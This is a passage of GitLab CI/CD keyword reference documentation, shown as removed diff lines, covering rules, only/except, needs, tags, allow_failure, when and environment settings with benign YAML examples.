URL: "http://docker-url.internal" - IMPORTANT_VAR: "the details" - GITLAB: "is-awesome" - rules: - - if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH - - if: $CI_COMMIT_BRANCH == "stable" - tags: - - docker - image: alpine - script: - - rake rspec -``` - -In this example: - -- The `variables` sections merge, but `URL: "http://docker-url.internal"` overwrites `URL: "http://my-url.internal"`. -- `tags: ['docker']` overwrites `tags: ['production']`. -- `script` does not merge, but `script: ['rake rspec']` overwrites - `script: ['echo "Hello world!"']`. You can use [YAML anchors](#anchors) to merge arrays. - -#### Use `extends` and `include` together - -To reuse configuration from different configuration files, -combine `extends` and [`include`](#include). - -In the following example, a `script` is defined in the `included.yml` file. -Then, in the `.gitlab-ci.yml` file, `extends` refers -to the contents of the `script`: - -- `included.yml`: - - ```yaml - .template: - script: - - echo Hello! - ``` - -- `.gitlab-ci.yml`: - - ```yaml - include: included.yml - - useTemplate: - image: alpine - extends: .template - ``` - -### `rules` - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/27863) in GitLab 12.3. - -Use `rules` to include or exclude jobs in pipelines. - -Rules are evaluated *in order* until the first match. When a match is found, the job -is either included or excluded from the pipeline, depending on the configuration. - -`rules` replaces [`only/except`](#only--except) and they can't be used together -in the same job. If you configure one job to use both keywords, the GitLab returns -a `key may not be used with rules` error. - -`rules` accepts an array of rules defined with: - -- `if` -- `changes` -- `exists` -- `allow_failure` -- `variables` -- `when` - -You can combine multiple keywords together for [complex rules](../jobs/job_control.md#complex-rules). - -The job is added to the pipeline: - -- If an `if`, `changes`, or `exists` rule matches and also has `when: on_success` (default), - `when: delayed`, or `when: always`. -- If a rule is reached that is only `when: on_success`, `when: delayed`, or `when: always`. - -The job is not added to the pipeline: - -- If no rules match. -- If a rule matches and has `when: never`. - -#### `rules:if` - -Use `rules:if` clauses to specify when to add a job to a pipeline: - -- If an `if` statement is true, add the job to the pipeline. -- If an `if` statement is true, but it's combined with `when: never`, do not add the job to the pipeline. -- If no `if` statements are true, do not add the job to the pipeline. - -`if:` clauses are evaluated based on the values of [predefined CI/CD variables](../variables/predefined_variables.md) -or [custom CI/CD variables](../variables/README.md#custom-cicd-variables). - -**Keyword type**: Job-specific and pipeline-specific. You can use it as part of a job -to configure the job behavior, or with [`workflow`](#workflow) to configure the pipeline behavior. - -**Possible inputs**: A [CI/CD variable expression](../jobs/job_control.md#cicd-variable-expressions). - -**Example of `rules:if`**: - -```yaml -job: - script: echo "Hello, Rules!" - rules: - - if: '$CI_MERGE_REQUEST_SOURCE_BRANCH_NAME =~ /^feature/ && $CI_MERGE_REQUEST_TARGET_BRANCH_NAME != $CI_DEFAULT_BRANCH' - when: never - - if: '$CI_MERGE_REQUEST_SOURCE_BRANCH_NAME =~ /^feature/' - when: manual - allow_failure: true - - if: '$CI_MERGE_REQUEST_SOURCE_BRANCH_NAME' -``` - -**Additional details**: - -- If a rule matches and has no `when` defined, the rule uses the `when` - defined for the job, which defaults to `on_success` if not defined. -- You can define `when` once per rule, or once at the job-level, which applies to - all rules. You can't mix `when` at the job-level with `when` in rules. -- Unlike variables in [`script`](../variables/README.md#use-cicd-variables-in-job-scripts) - sections, variables in rules expressions are always formatted as `$VARIABLE`. - -**Related topics**: - -- [Common `if` expressions for `rules`](../jobs/job_control.md#common-if-clauses-for-rules). -- [Avoid duplicate pipelines](../jobs/job_control.md#avoid-duplicate-pipelines). - -#### `rules:changes` - -Use `rules:changes` to specify when to add a job to a pipeline by checking for changes -to specific files. - -WARNING: -You should use `rules: changes` only with **branch pipelines** or **merge request pipelines**. -You can use `rules: changes` with other pipeline types, but `rules: changes` always -evaluates to true when there is no Git `push` event. Tag pipelines, scheduled pipelines, -and so on do **not** have a Git `push` event associated with them. A `rules: changes` job -is **always** added to those pipelines if there is no `if:` that limits the job to -branch or merge request pipelines. - -**Keyword type**: Job keyword. You can use it only as part of a job. - -**Possible inputs**: An array of file paths. In GitLab 13.6 and later, -[file paths can include variables](../jobs/job_control.md#variables-in-ruleschanges). - -**Example of `rules:changes`**: - -```yaml -docker build: - script: docker build -t my-image:$CI_COMMIT_REF_SLUG . - rules: - - if: '$CI_PIPELINE_SOURCE == "merge_request_event"' - changes: - - Dockerfile - when: manual - allow_failure: true -``` - -- If the pipeline is a merge request pipeline, check `Dockerfile` for changes. -- If `Dockerfile` has changed, add the job to the pipeline as a manual job, and the pipeline - continues running even if the job is not triggered (`allow_failure: true`). -- If `Dockerfile` has not changed, do not add job to any pipeline (same as `when: never`). - -**Additional details**: - -- `rules: changes` works the same way as [`only: changes` and `except: changes`](#onlychanges--exceptchanges). -- You can use `when: never` to implement a rule similar to [`except:changes`](#onlychanges--exceptchanges). - -#### `rules:exists` - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/24021) in GitLab 12.4. - -Use `exists` to run a job when certain files exist in the repository. - -**Keyword type**: Job keyword. You can use it only as part of a job. - -**Possible inputs**: An array of file paths. Paths are relative to the project directory (`$CI_PROJECT_DIR`) -and can't directly link outside it. File paths can use glob patterns. - -**Example of `rules:exists`**: - -```yaml -job: - script: docker build -t my-image:$CI_COMMIT_REF_SLUG . - rules: - - exists: - - Dockerfile -``` - -`job` runs if a `Dockerfile` exists anywhere in the repository. - -**Additional details**: - -- Glob patterns are interpreted with Ruby [`File.fnmatch`](https://docs.ruby-lang.org/en/2.7.0/File.html#method-c-fnmatch) - with the flags `File::FNM_PATHNAME | File::FNM_DOTMATCH | File::FNM_EXTGLOB`. -- For performance reasons, GitLab matches a maximum of 10,000 `exists` patterns or - file paths. After the 10,000th check, rules with patterned globs always match. - In other words, the `exists` rule always assumes a match in projects with more - than 10,000 files. - -#### `rules:allow_failure` - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/30235) in GitLab 12.8. - -Use [`allow_failure: true`](#allow_failure) in `rules:` to allow a job to fail -without stopping the pipeline. - -You can also use `allow_failure: true` with a manual job. The pipeline continues -running without waiting for the result of the manual job. `allow_failure: false` -combined with `when: manual` in rules causes the pipeline to wait for the manual -job to run before continuing. - -**Keyword type**: Job keyword. You can use it only as part of a job. - -**Possible inputs**: `true` or `false`. Defaults to `false` if not defined. - -**Example of `rules:allow_failure`**: - -```yaml -job: - script: echo "Hello, Rules!" - rules: - - if: '$CI_MERGE_REQUEST_TARGET_BRANCH_NAME == $CI_DEFAULT_BRANCH' - when: manual - allow_failure: true -``` - -If the rule matches, then the job is a manual job with `allow_failure: true`. - -**Additional details**: - -- The rule-level `rules:allow_failure` overrides the job-level [`allow_failure`](#allow_failure), - and only applies when the specific rule triggers the job. - -#### `rules:variables` - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/209864) in GitLab 13.7. -> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/289803) in GitLab 13.10. - -Use [`variables`](#variables) in `rules:` to define variables for specific conditions. - -**Keyword type**: Job-specific. You can use it only as part of a job. - -**Possible inputs**: A hash of variables in the format `VARIABLE-NAME: value`. - -**Example of `rules:variables`**: - -```yaml -job: - variables: - DEPLOY_VARIABLE: "default-deploy" - rules: - - if: $CI_COMMIT_REF_NAME == $CI_DEFAULT_BRANCH - variables: # Override DEPLOY_VARIABLE defined - DEPLOY_VARIABLE: "deploy-production" # at the job level. - - if: $CI_COMMIT_REF_NAME =~ /feature/ - variables: - IS_A_FEATURE: "true" # Define a new variable. - script: - - echo "Run script with $DEPLOY_VARIABLE as an argument" - - echo "Run another script if $IS_A_FEATURE exists" -``` - -### `only` / `except` - -NOTE: -`only` and `except` are not being actively developed. [`rules`](#rules) is the preferred -keyword to control when to add jobs to pipelines. - -You can use `only` and `except` to control when to add jobs to pipelines. - -- Use `only` to define when a job runs. -- Use `except` to define when a job **does not** run. - -Four keywords can be used with `only` and `except`: - -- [`refs`](#onlyrefs--exceptrefs) -- [`variables`](#onlyvariables--exceptvariables) -- [`changes`](#onlychanges--exceptchanges) -- [`kubernetes`](#onlykubernetes--exceptkubernetes) - -See [specify when jobs run with `only` and `except`](../jobs/job_control.md#specify-when-jobs-run-with-only-and-except) -for more details and examples. - -#### `only:refs` / `except:refs` - -Use the `only:refs` and `except:refs` keywords to control when to add jobs to a -pipeline based on branch names or pipeline types. - -**Keyword type**: Job keyword. You can use it only as part of a job. - -**Possible inputs**: An array including any number of: - -- Branch names, for example `main` or `my-feature-branch`. -- [Regular expressions](../jobs/job_control.md#only--except-regex-syntax) - that match against branch names, for example `/^feature-.*/`. -- The following keywords: - - | **Value** | **Description** | - | -------------------------|-----------------| - | `api` | For pipelines triggered by the [pipelines API](../../api/pipelines.md#create-a-new-pipeline). | - | `branches` | When the Git reference for a pipeline is a branch. | - | `chat` | For pipelines created by using a [GitLab ChatOps](../chatops/index.md) command. | - | `external` | When you use CI services other than GitLab. | - | `external_pull_requests` | When an external pull request on GitHub is created or updated (See [Pipelines for external pull requests](../ci_cd_for_external_repos/index.md#pipelines-for-external-pull-requests)). | - | `merge_requests` | For pipelines created when a merge request is created or updated. Enables [merge request pipelines](../merge_request_pipelines/index.md), [merged results pipelines](../merge_request_pipelines/pipelines_for_merged_results/index.md), and [merge trains](../merge_request_pipelines/pipelines_for_merged_results/merge_trains/index.md). | - | `pipelines` | For [multi-project pipelines](../multi_project_pipelines.md) created by [using the API with `CI_JOB_TOKEN`](../multi_project_pipelines.md#triggering-multi-project-pipelines-through-api), or the [`trigger`](#trigger) keyword. | - | `pushes` | For pipelines triggered by a `git push` event, including for branches and tags. | - | `schedules` | For [scheduled pipelines](../pipelines/schedules.md). | - | `tags` | When the Git reference for a pipeline is a tag. | - | `triggers` | For pipelines created by using a [trigger token](../triggers/README.md#trigger-token). | - | `web` | For pipelines created by using **Run pipeline** button in the GitLab UI, from the project's **CI/CD > Pipelines** section. | - -**Example of `only:refs` and `except:refs`**: - -```yaml -job1: - script: echo - only: - - main - - /^issue-.*$/ - - merge_requests - -job2: - script: echo - except: - - main - - /^stable-branch.*$/ - - schedules -``` - -**Additional details:** - -- Scheduled pipelines run on specific branches, so jobs configured with `only: branches` - run on scheduled pipelines too. Add `except: schedules` to prevent jobs with `only: branches` - from running on scheduled pipelines. -- `only` or `except` used without any other keywords are equivalent to `only: refs` - or `except: refs`. For example, the following two jobs configurations have the same - behavior: - - ```yaml - job1: - script: echo - only: - - branches - - job2: - script: echo - only: - refs: - - branches - ``` - -- If a job does not use `only`, `except`, or [`rules`](#rules), then `only` is set to `branches` - and `tags` by default. - - For example, `job1` and `job2` are equivalent: - - ```yaml - job1: - script: echo 'test' - - job2: - script: echo 'test' - only: - - branches - - tags - ``` - -#### `only:variables` / `except:variables` - -Use the `only:variables` or `except:variables` keywords to control when to add jobs -to a pipeline, based on the status of [CI/CD variables](../variables/README.md). - -**Keyword type**: Job keyword. You can use it only as part of a job. - -**Possible inputs**: An array of [CI/CD variable expressions](../jobs/job_control.md#cicd-variable-expressions). - -**Example of `only:variables`**: - -```yaml -deploy: - script: cap staging deploy - only: - variables: - - $RELEASE == "staging" - - $STAGING -``` - -**Related topics**: - -- [`only:variables` and `except:variables` examples](../jobs/job_control.md#only-variables--except-variables-examples). - -#### `only:changes` / `except:changes` - -> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/19232) in GitLab 11.4. - -Use the `changes` keyword with `only` to run a job, or with `except` to skip a job, -when a Git push event modifies a file. - -Use `changes` in pipelines with the following refs: - -- `branches` -- `external_pull_requests` -- `merge_requests` (see additional details about [using `only:changes` with pipelines for merge requests](../jobs/job_control.md#use-onlychanges-with-pipelines-for-merge-requests)) - -**Keyword type**: Job keyword. You can use it only as part of a job. - -**Possible inputs**: An array including any number of: - -- Paths to files. -- Wildcard paths for single directories, for example `path/to/directory/*`, or a directory - and all its subdirectories, for example `path/to/directory/**/*`. -- Wildcard ([glob](https://en.wikipedia.org/wiki/Glob_(programming))) paths for all - files with the same extension or multiple extensions, for example `*.md` or `path/to/directory/*.{rb,py,sh}`. -- Wildcard paths to files in the root directory, or all directories, wrapped in double quotes. - For example `"*.json"` or `"**/*.json"`. - -**Example of `only:changes`**: - -```yaml -docker build: - script: docker build -t my-image:$CI_COMMIT_REF_SLUG . - only: - refs: - - branches - changes: - - Dockerfile - - docker/scripts/* - - dockerfiles/**/* - - more_scripts/*.{rb,py,sh} -``` - -**Additional details**: - -- If you use refs other than `branches`, `external_pull_requests`, or `merge_requests`, - `changes` can't determine if a given file is new or old and always returns `true`. -- If you use `only: changes` with other refs, jobs ignore the changes and always run. -- If you use `except: changes` with other refs, jobs ignore the changes and never run. - -**Related topics**: - -- [`only: changes` and `except: changes` examples](../jobs/job_control.md#onlychanges--exceptchanges-examples). -- If you use `changes` with [only allow merge requests to be merged if the pipeline succeeds](../../user/project/merge_requests/merge_when_pipeline_succeeds.md#only-allow-merge-requests-to-be-merged-if-the-pipeline-succeeds), - you should [also use `only:merge_requests`](../jobs/job_control.md#use-onlychanges-with-pipelines-for-merge-requests). -- Use `changes` with [new branches or tags *without* pipelines for merge requests](../jobs/job_control.md#use-onlychanges-without-pipelines-for-merge-requests). -- Use `changes` with [scheduled pipelines](../jobs/job_control.md#use-onlychanges-with-scheduled-pipelines). - -#### `only:kubernetes` / `except:kubernetes` - -Use `only:kubernetes` or `except:kubernetes` to control if jobs are added to the pipeline -when the Kubernetes service is active in the project. - -**Keyword type**: Job-specific. You can use it only as part of a job. - -**Possible inputs**: The `kubernetes` strategy accepts only the `active` keyword. - -**Example of `only:kubernetes`**: - -```yaml -deploy: - only: - kubernetes: active -``` - -In this example, the `deploy` job runs only when the Kubernetes service is active -in the project. - -### `needs` - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/47063) in GitLab 12.2. -> - In GitLab 12.3, maximum number of jobs in `needs` array raised from five to 50. -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/30631) in GitLab 12.8, `needs: []` lets jobs start immediately. - -Use `needs:` to execute jobs out-of-order. Relationships between jobs -that use `needs` can be visualized as a [directed acyclic graph](../directed_acyclic_graph/index.md). - -You can ignore stage ordering and run some jobs without waiting for others to complete. -Jobs in multiple stages can run concurrently. - -The following example creates four paths of execution: - -- Linter: the `lint` job runs immediately without waiting for the `build` stage - to complete because it has no needs (`needs: []`). -- Linux path: the `linux:rspec` and `linux:rubocop` jobs runs as soon as the `linux:build` - job finishes without waiting for `mac:build` to finish. -- macOS path: the `mac:rspec` and `mac:rubocop` jobs runs as soon as the `mac:build` - job finishes, without waiting for `linux:build` to finish. -- The `production` job runs as soon as all previous jobs finish; in this case: - `linux:build`, `linux:rspec`, `linux:rubocop`, `mac:build`, `mac:rspec`, `mac:rubocop`. - -```yaml -linux:build: - stage: build - -mac:build: - stage: build - -lint: - stage: test - needs: [] - -linux:rspec: - stage: test - needs: ["linux:build"] - -linux:rubocop: - stage: test - needs: ["linux:build"] - -mac:rspec: - stage: test - needs: ["mac:build"] - -mac:rubocop: - stage: test - needs: ["mac:build"] - -production: - stage: deploy -``` - -#### Requirements and limitations - -- In GitLab 13.9 and older, if `needs:` refers to a job that might not be added to - a pipeline because of `only`, `except`, or `rules`, the pipeline might fail to create. -- The maximum number of jobs that a single job can need in the `needs:` array is limited: - - For GitLab.com, the limit is 50. For more information, see our - [infrastructure issue](https://gitlab.com/gitlab-com/gl-infra/infrastructure/-/issues/7541). - - For self-managed instances, the limit is: 50. This limit [can be changed](#changing-the-needs-job-limit). -- If `needs:` refers to a job that uses the [`parallel`](#parallel) keyword, - it depends on all jobs created in parallel, not just one job. It also downloads - artifacts from all the parallel jobs by default. If the artifacts have the same - name, they overwrite each other and only the last one downloaded is saved. -- `needs:` is similar to `dependencies:` in that it must use jobs from prior stages, - meaning it's impossible to create circular dependencies. Depending on jobs in the - current stage is not possible either, but support [is planned](https://gitlab.com/gitlab-org/gitlab/-/issues/30632). -- Stages must be explicitly defined for all jobs - that have the keyword `needs:` or are referred to by one. - -##### Changing the `needs:` job limit **(FREE SELF)** - -The maximum number of jobs that can be defined in `needs:` defaults to 50. - -A GitLab administrator with [access to the GitLab Rails console](../../administration/feature_flags.md) -can choose a custom limit. For example, to set the limit to 100: - -```ruby -Plan.default.actual_limits.update!(ci_needs_size_limit: 100) -``` - -To disable directed acyclic graphs (DAG), set the limit to `0`. - -#### Artifact downloads with `needs` - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/14311) in GitLab v12.6. - -When a job uses `needs`, it no longer downloads all artifacts from previous stages -by default, because jobs with `needs` can start before earlier stages complete. With -`needs` you can only download artifacts from the jobs listed in the `needs:` configuration. - -Use `artifacts: true` (default) or `artifacts: false` to control when artifacts are -downloaded in jobs that use `needs`. - -In the following example, the `rspec` job downloads the `build_job` artifacts, but the -`rubocop` job does not: - -```yaml -build_job: - stage: build - artifacts: - paths: - - binaries/ - -rspec: - stage: test - needs: - - job: build_job - artifacts: true - -rubocop: - stage: test - needs: - - job: build_job - artifacts: false -``` - -In the following example, the `rspec` job downloads the artifacts from all three `build_jobs`. -`artifacts` is: - -- Set to true for `build_job_1`. -- Defaults to true for both `build_job_2` and `build_job_3`. - -```yaml -rspec: - needs: - - job: build_job_1 - artifacts: true - - job: build_job_2 - - build_job_3 -``` - -In GitLab 12.6 and later, you can't combine the [`dependencies`](#dependencies) keyword -with `needs`. - -#### Cross project artifact downloads with `needs` **(PREMIUM)** - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/14311) in GitLab v12.7. - -Use `needs` to download artifacts from up to five jobs in pipelines: - -- [On other refs in the same project](#artifact-downloads-between-pipelines-in-the-same-project). -- In different projects, groups and namespaces. - -```yaml -build_job: - stage: build - script: - - ls -lhR - needs: - - project: namespace/group/project-name - job: build-1 - ref: main - artifacts: true -``` - -`build_job` downloads the artifacts from the latest successful `build-1` job -on the `main` branch in the `group/project-name` project. If the project is in the -same group or namespace, you can omit them from the `project:` keyword. For example, -`project: group/project-name` or `project: project-name`. - -The user running the pipeline must have at least `reporter` access to the group or project, or the group/project must have public visibility. - -##### Artifact downloads between pipelines in the same project - -Use `needs` to download artifacts from different pipelines in the current project. -Set the `project` keyword as the current project's name, and specify a ref. - -In the following example, `build_job` downloads the artifacts for the latest successful -`build-1` job with the `other-ref` ref: - -```yaml -build_job: - stage: build - script: - - ls -lhR - needs: - - project: group/same-project-name - job: build-1 - ref: other-ref - artifacts: true -``` - -CI/CD variable support for `project:`, `job:`, and `ref` was [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/202093) -in GitLab 13.3. [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/235761) in GitLab 13.4. - -For example: - -```yaml -build_job: - stage: build - script: - - ls -lhR - needs: - - project: $CI_PROJECT_PATH - job: $DEPENDENCY_JOB_NAME - ref: $ARTIFACTS_DOWNLOAD_REF - artifacts: true -``` - -You can't download artifacts from jobs that run in [`parallel:`](#parallel). - -To download artifacts between [parent-child pipelines](../parent_child_pipelines.md), -use [`needs:pipeline`](#artifact-downloads-to-child-pipelines). - -You should not download artifacts from the same ref as a running pipeline. Concurrent -pipelines running on the same ref could override the artifacts. - -##### Artifact downloads to child pipelines - -> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/255983) in GitLab v13.7. - -A [child pipeline](../parent_child_pipelines.md) can download artifacts from a job in -its parent pipeline or another child pipeline in the same parent-child pipeline hierarchy. - -For example, with the following parent pipeline that has a job that creates some artifacts: - -```yaml -create-artifact: - stage: build - script: echo 'sample artifact' > artifact.txt - artifacts: - paths: [artifact.txt] - -child-pipeline: - stage: test - trigger: - include: child.yml - strategy: depend - variables: - PARENT_PIPELINE_ID: $CI_PIPELINE_ID -``` - -A job in the child pipeline can download artifacts from the `create-artifact` job in -the parent pipeline: - -```yaml -use-artifact: - script: cat artifact.txt - needs: - - pipeline: $PARENT_PIPELINE_ID - job: create-artifact -``` - -The `pipeline` attribute accepts a pipeline ID and it must be a pipeline present -in the same parent-child pipeline hierarchy of the given pipeline. - -The `pipeline` attribute does not accept the current pipeline ID (`$CI_PIPELINE_ID`). -To download artifacts from a job in the current pipeline, use the basic form of [`needs`](#artifact-downloads-with-needs). - -#### Optional `needs` - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/30680) in GitLab 13.10. -> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/323891) in GitLab 14.0. - -To need a job that sometimes does not exist in the pipeline, add `optional: true` -to the `needs` configuration. If not defined, `optional: false` is the default. - -Jobs that use [`rules`](#rules), [`only`, or `except`](#only--except), might -not always exist in a pipeline. When the pipeline starts, it checks the `needs` -relationships before running. Without `optional: true`, needs relationships that -point to a job that does not exist stops the pipeline from starting and causes a pipeline -error similar to: - -- `'job1' job needs 'job2' job, but it was not added to the pipeline` - -In this example: - -- When the branch is the default branch, the `build` job exists in the pipeline, and the `rspec` - job waits for it to complete before starting. -- When the branch is not the default branch, the `build` job does not exist in the pipeline. - The `rspec` job runs immediately (similar to `needs: []`) because its `needs` - relationship to the `build` job is optional. - -```yaml -build: - stage: build - rules: - - if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH - -rspec: - stage: test - needs: - - job: build - optional: true -``` - -### `tags` - -Use `tags` to select a specific runner from the list of all runners that are -available for the project. - -When you register a runner, you can specify the runner's tags, for -example `ruby`, `postgres`, `development`. - -In the following example, the job is run by a runner that -has both `ruby` and `postgres` tags defined. - -```yaml -job: - tags: - - ruby - - postgres -``` - -You can use tags to run different jobs on different platforms. For -example, if you have an OS X runner with tag `osx` and a Windows runner with tag -`windows`, you can run a job on each platform: - -```yaml -windows job: - stage: - - build - tags: - - windows - script: - - echo Hello, %USERNAME%! - -osx job: - stage: - - build - tags: - - osx - script: - - echo "Hello, $USER!" -``` - -### `allow_failure` - -Use `allow_failure` when you want to let a job fail without impacting the rest of the CI -suite. The default value is `false`, except for [manual](#whenmanual) jobs that use -the `when: manual` syntax. - -In jobs that use [`rules:`](#rules), all jobs default to `allow_failure: false`, -*including* `when: manual` jobs. - -When `allow_failure` is set to `true` and the job fails, the job shows an orange warning in the UI. -However, the logical flow of the pipeline considers the job a -success/passed, and is not blocked. - -Assuming all other jobs are successful, the job's stage and its pipeline -show the same orange warning. However, the associated commit is marked as -"passed", without warnings. - -In the following example, `job1` and `job2` run in parallel. If `job1` -fails, it doesn't stop the next stage from running, because it's marked with -`allow_failure: true`: - -```yaml -job1: - stage: test - script: - - execute_script_that_will_fail - allow_failure: true - -job2: - stage: test - script: - - execute_script_that_will_succeed - -job3: - stage: deploy - script: - - deploy_to_staging -``` - -#### `allow_failure:exit_codes` - -> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/273157) in GitLab 13.8. -> - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/292024) in GitLab 13.9. - -Use `allow_failure:exit_codes` to dynamically control if a job should be allowed -to fail. You can list which exit codes are not considered failures. The job fails -for any other exit code: - -```yaml -test_job_1: - script: - - echo "Run a script that results in exit code 1. This job fails." - - exit 1 - allow_failure: - exit_codes: 137 - -test_job_2: - script: - - echo "Run a script that results in exit code 137. This job is allowed to fail." - - exit 137 - allow_failure: - exit_codes: - - 137 - - 255 -``` - -### `when` - -Use `when` to implement jobs that run in case of failure or despite the -failure. - -The valid values of `when` are: - -1. `on_success` (default) - Execute job only when all jobs in earlier stages succeed, - or are considered successful because they have `allow_failure: true`. -1. `on_failure` - Execute job only when at least one job in an earlier stage fails. -1. `always` - Execute job regardless of the status of jobs in earlier stages. -1. `manual` - Execute job [manually](#whenmanual). -1. `delayed` - [Delay the execution of a job](#whendelayed) for a specified duration. - Added in GitLab 11.14. -1. `never`: - - With job [`rules`](#rules), don't execute job. - - With [`workflow:rules`](#workflow), don't run pipeline. - -In the following example, the script: - -1. Executes `cleanup_build_job` only when `build_job` fails. -1. Always executes `cleanup_job` as the last step in pipeline regardless of - success or failure. -1. Executes `deploy_job` when you run it manually in the GitLab UI. - -```yaml -stages: - - build - - cleanup_build - - test - - deploy - - cleanup - -build_job: - stage: build - script: - - make build - -cleanup_build_job: - stage: cleanup_build - script: - - cleanup build when failed - when: on_failure - -test_job: - stage: test - script: - - make test - -deploy_job: - stage: deploy - script: - - make deploy - when: manual - -cleanup_job: - stage: cleanup - script: - - cleanup after jobs - when: always -``` - -#### `when:manual` - -A manual job is a type of job that is not executed automatically and must be explicitly -started by a user. You might want to use manual jobs for things like deploying to production. - -To make a job manual, add `when: manual` to its configuration. - -When the pipeline starts, manual jobs display as skipped and do not run automatically. -They can be started from the pipeline, job, [environment](../environments/index.md#configure-manual-deployments), -and deployment views. - -Manual jobs can be either optional or blocking: - -- **Optional**: Manual jobs have [`allow_failure: true](#allow_failure) set by default - and are considered optional. The status of an optional manual job does not contribute - to the overall pipeline status. A pipeline can succeed even if all its manual jobs fail. - -- **Blocking**: To make a blocking manual job, add `allow_failure: false` to its configuration. - Blocking manual jobs stop further execution of the pipeline at the stage where the - job is defined. To let the pipeline continue running, click **{play}** (play) on - the blocking manual job. - - Merge requests in projects with [merge when pipeline succeeds](../../user/project/merge_requests/merge_when_pipeline_succeeds.md) - enabled can't be merged with a blocked pipeline. Blocked pipelines show a status - of **blocked**. - -When you use [`rules:`](#rules), `allow_failure` defaults to `false`, including for manual jobs. - -To trigger a manual job, a user must have permission to merge to the assigned branch. -You can use [protected branches](../../user/project/protected_branches.md) to more strictly -[protect manual deployments](#protecting-manual-jobs) from being run by unauthorized users. - -In [GitLab 13.5](https://gitlab.com/gitlab-org/gitlab/-/issues/201938) and later, you -can use `when:manual` in the same job as [`trigger`](#trigger). In GitLab 13.4 and -earlier, using them together causes the error `jobs:#{job-name} when should be on_success, on_failure or always`. - -##### Protecting manual jobs **(PREMIUM)** - -Use [protected environments](../environments/protected_environments.md) -to define a list of users authorized to run a manual job. You can authorize only -the users associated with a protected environment to trigger manual jobs, which can: - -- More precisely limit who can deploy to an environment. -- Block a pipeline until an approved user "approves" it. - -To protect a manual job: - -1. Add an `environment` to the job. For example: - - ```yaml - deploy_prod: - stage: deploy - script: - - echo "Deploy to production server" - environment: - name: production - url: https://example.com - when: manual - rules: - - if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH - ``` - -1. In the [protected environments settings](../environments/protected_environments.md#protecting-environments), - select the environment (`production` in this example) and add the users, roles or groups - that are authorized to trigger the manual job to the **Allowed to Deploy** list. Only those in - this list can trigger this manual job, as well as GitLab administrators - who are always able to use protected environments. - -You can use protected environments with blocking manual jobs to have a list of users -allowed to approve later pipeline stages. Add `allow_failure: false` to the protected -manual job and the pipeline's next stages only run after the manual job is triggered -by authorized users. - -#### `when:delayed` - -> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/51352) in GitLab 11.4. - -Use `when: delayed` to execute scripts after a waiting period, or if you want to avoid -jobs immediately entering the `pending` state. - -You can set the period with `start_in` keyword. The value of `start_in` is an elapsed time in seconds, unless a unit is -provided. `start_in` must be less than or equal to one week. Examples of valid values include: - -- `'5'` -- `5 seconds` -- `30 minutes` -- `1 day` -- `1 week` - -When a stage includes a delayed job, the pipeline doesn't progress until the delayed job finishes. -You can use this keyword to insert delays between different stages. - -The timer of a delayed job starts immediately after the previous stage completes. -Similar to other types of jobs, a delayed job's timer doesn't start unless the previous stage passes. - -The following example creates a job named `timed rollout 10%` that is executed 30 minutes after the previous stage completes: - -```yaml -timed rollout 10%: - stage: deploy - script: echo 'Rolling out 10% ...' - when: delayed - start_in: 30 minutes -``` - -To stop the active timer of a delayed job, click the **{time-out}** (**Unschedule**) button. -This job can no longer be scheduled to run automatically. You can, however, execute the job manually. - -To start a delayed job immediately, click the **Play** button. -Soon GitLab Runner picks up and starts the job. - -### `environment` - -Use `environment` to define the [environment](../environments/index.md) that a job deploys to. -For example: - -```yaml -deploy to production: - stage: deploy - script: git push production HEAD:main - environment: production -``` - -You can assign a value to the `environment` keyword by using: - -- Plain text, like `production`. -- Variables, including CI/CD variables, predefined, secure, or variables - defined in the `.gitlab-ci.yml` file. - -You can't use variables defined in a `script` section. - -If you specify an `environment` and no environment with that name exists, -an environment is created. - -#### `environment:name` - -Set a name for an [environment](../environments/index.md). For example: - -```yaml -deploy to production: - stage: deploy - script: git push production HEAD:main - environment: - name: production -``` - -Common environment names are `qa`, `staging`, and `production`, but you can use any -name you want. - -You can assign a value to the `name` keyword by using: - -- Plain text, like `staging`. -- Variables, including CI/CD variables, predefined, secure, or variables - defined in the `.gitlab-ci.yml` file. - -You can't use variables defined in a `script` section. - -The environment `name` can contain: - -- Letters -- Digits -- Spaces -- `-` -- `_` -- `/` -- `$` -- `{` -- `}` - -#### `environment:url` - -Set a URL for an [environment](../environments/index.md). For example: - -```yaml -deploy to production: - stage: deploy - script: git push production HEAD:main - environment: - name: production - url: https://prod.example.com -``` - -After the job completes, you can access the URL by using a button in the merge request, -environment, or deployment pages. - -You can assign a value to the `url` keyword by using: - -- Plain text, like `https://prod.example.com`. -- Variables, including CI/CD variables, predefined, secure, or variables - defined in the `.gitlab-ci.yml` file. - -You can't use variables defined in a `script` section. - -#### `environment:on_stop` - -Closing (stopping) environments can be achieved with the `on_stop` keyword -defined under `environment`. It declares a different job that runs to close the -environment. - -Read the `environment:action` section for an example. - -#### `environment:action` - -Use the `action` keyword to specify jobs that prepare, start, or stop environments. - -| **Value** | **Description** | -|-----------|---------------------------------------------------------------------------------------------------------------------------------------------------------------| -| `start` | Default value. Indicates that job starts the environment. The deployment is created after the job starts. | -| `prepare` | Indicates that the job is only preparing the environment. It does not trigger deployments. [Read more about preparing environments](../environments/index.md#prepare-an-environment-without-creating-a-deployment). | -| `stop` | Indicates that job stops deployment. See the example below. | - -Take for instance: - -```yaml -review_app: - stage: deploy - script: make deploy-app - environment: - name: 